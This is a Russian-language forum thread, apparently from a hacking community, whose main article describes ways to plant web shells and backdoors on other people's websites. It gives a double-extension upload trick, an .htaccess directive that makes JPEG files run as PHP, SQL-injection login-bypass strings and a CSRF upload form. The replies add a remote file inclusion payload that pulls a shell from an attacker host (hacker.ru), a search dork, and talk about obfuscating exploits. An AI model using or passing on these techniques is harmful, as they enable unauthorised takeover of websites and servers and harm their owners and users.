Статья Способы загрузки шелла/бэкдора на сайт.

В этой статье я хочу рассказать о чаще используемых способах заливки шелла на сайт. Web-shell - это некий вредоносный скрипт (программа), который злоумышленники используют для управления сайтами или серверами.

Способ 1

Найти на сайте форму для загрузки файлов/картинок. Допустим нам не удалось взломать админку сайта и мы пытаемся залить наш шелл с расширением .php.jpg . Если удалось, то мы увидим вместо картинки белое окно, мы кликаем правой кнопкой мыши и переходим по ссылке. В случае провала мы можем воспользоваться расширением chrome tamper data. Оно позволяет перехватить и изменить запрос как вы хотите. Если сайт проверяет, расширение файла, то сначала мы можем залить .htaccess файл с содержимым:
Код:
AddType application/x-httpd-php .jpg
Данная команда будет выполнять jpg файлы как php.
Подробная видеоинструкция:

Видеоинструкция по установке tamper data:

Способ 2
Воспользоваться программой для поиска админок на сайте - https://github.com/bdblackhat/admin-panel-finder. Когда программа нашла админку мы можем попробовать провести sql-injection. В поле логина и пароля сайта мы вбиваем код:
Код:
' or '1'='1
' OR 1=1/*
Если срабатывает, то мы попадаем в админку и действуем по 1 способу . Если же на сайте в панели администратора нет sql-injection, тогда мы можем попробовать сбрутить или же найти эксплоит под данную CMS.
Подробная видеоинструкция:

Способ 3

В 3 способе мы будем искать sql-injection на самом сайте. Мы может делать это вручную или же воспользуемся . На форуме достаточно тем, как можно проводить инъекции, так что зайду издалека. Итак, вот мы уже нашли таблицу с логином и паролем админа расшифровываем хэши заходим в админку и радуемся. Но допустим мы не смогли расшифровать пароль и все накрылось медным тазом, тогда мы должны проверить привилегии нашего юзера. Проверяем привилегии и загружаем мини-шелл. По каким-то причинам когда я хочу вставить код сайт выдает ошбику .


Способ 4
4 способ подразумевает csrf атаку. В ниже приведенном коде нам нужно заменить http:// на ссылку нашей цели. Выбрать шелл и нажать кнопку upload.
Код:
<form method="POST" action="http://" enctype="multipart/form-data" >
<input type="file" name="Filedata"></center><br>
<input type="submit" name="Submit" value="Upload">
</form>
Подробная видеоинструкция:

Способ 5
Узнать как больше о вашей цели и подыскать эксплоит. Для этого есть очень интересный сайт - . Никто и не отменял массовый взлом сайтов через уязвимости, но про это уже есть статья на форме.

Существует еще множество способов заливки шелла и рассказывать о каждом нет смысла. Если вы хотите потренироваться, то установите dvwa - это программа созданная для того, чтобы помочь профессионалам по безопасности протестировать их навыки и инструменты в легальном окружении .
 

<~DarkNode~>

~^M1st3r_Bert0ni^~
Platinum
19.10.2016
722
3 099
BIT
0
Burp имхо это mustknow,musthave при работе с вебом... Но это мое имхо...
 
  • Нравится
Реакции: MLNK
B

bb-8

Можно идиотский вопрос?
Допустим, удалось загрузить файл. Как его запустить? Как прописать запуск файла, например, при обновлении этой страницы

---- Добавлено позже ----

Сразу вопрос - допустим удалось загрузить файл .php через аватарку. Как прописать, что бы он запустился?


просто "бурпсюте" своего рода "швейцарский нож" для пентеста web с кучей дополнительных возможностей и плагинов, а утилита предложенная автором "темпер дата", лишь узко заточенная утилита)))
Надеюсь пользователи сайта будут более терпимыми друг к другу

---- Добавлено позже ----

друзья почему столько негатива)))
лишь о общении рождается истина)))
 
Последнее редактирование модератором:

Akis

One Level
17.12.2016
8
1
BIT
0
Я видел видео как повязать exe на jpg и хотел найти способ и нашёл автора kingcope (Nicolaos Rangos) но он не сказал способ. Он мог ловит видеокадры от беспилотника и найти местонахождения куда отправляет сигнал.
 

Citizen0

Green Team
07.02.2017
203
228
BIT
0
Сразу вопрос - допустим удалось загрузить файл .php через аватарку. Как прописать, что бы он запустился?
Обратитесь к нему по прямой ссылке.
Например, Ваш аватар на данном форуме
Код:
https://codeby.net/data/avatars/s/82/82940.jpg
Если бы Вы смогли загрузить php файл, то
Код:
https://codeby.net/data/avatars/s/82/82940.php
 

shuwaev

Member
07.02.2018
15
0
BIT
0
Способ 6
Php-injection - это форма атаки на сайт, когда атакующий внедряет свой php-код в атакуемое php-приложение.
Код:
www.site.ru?page=home.html
Выполнив команду мы подгрузим страницу home,html. Теперь мы попробуем подгрузить вредоносный шелл.

Код:
www.site.ru?page=http:/hacker.ru/webshell.php
Дорк: Inurl:page=

Также есть способ найти уже залитый шелл с помощью perl скрипта.
Подробная видеоинструкция:
я нашел уязвимость xsrf через w3af скажи ево можно взломать через 4 способ если да то как найти ссылку для загрузки шелла
 
M

Markus.c99

Одна из лучших статьей , как по мне.
 
E

eastpearldxb

А если на сайте нельзя запусткать PHP скрипты?
 
T

Tsunami

Все гораздо проще гайсы))))
Берется сперва ищется вектор для загрузки веб шелла)
К примеру если CMS WordPress или Joomla последней версии без уязвимых плагинов - то загрузка шелла только после доступа к админ панели возможна))) И никакие тампер дата и выше описанные методы не помогут , и даже супер пупер универсальные))) Хеххех))
Если бы был супер универсальный метод у этого мембера то он бы в комментах не писал а заскринил залитый шелл на этом форуме)

То бишь хотите сказать можно даже откинуть вариант по поиску собственноручно уязвимостей в плагинах, темах и тд. ?
 
G

Germ3s

Данная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты , (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
 
Последнее редактирование модератором:

krypt0n

Green Team
12.11.2017
139
68
BIT
0
Данная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты , (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
какой по советуешь и как лучше его обфуцироть или нет?
 

DefWolf

Green Team
24.10.2017
288
795
BIT
0
Данная статья не о чем,паблик с ютуба и не годится для 2018 ,все выше описанное работает только на г***о сайтах типа "Hello World !"
Юзайте эксплоиты , (НЕ РЕКЛАМА)
Находите уязвимости через axunetix,sqlmap, сливайте админов и заливайте шелл
Я описал стандартные способы, конечно находят новые узявимости, в Drupal, Apache, ты прочитай внимательней, я описал несколько эксплоитов, с помощью которых была массовая заливка. Твой комментарий не о чем, лучше бы рассказал об уязвимостях. И да это работает на самонаписных сайтах
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!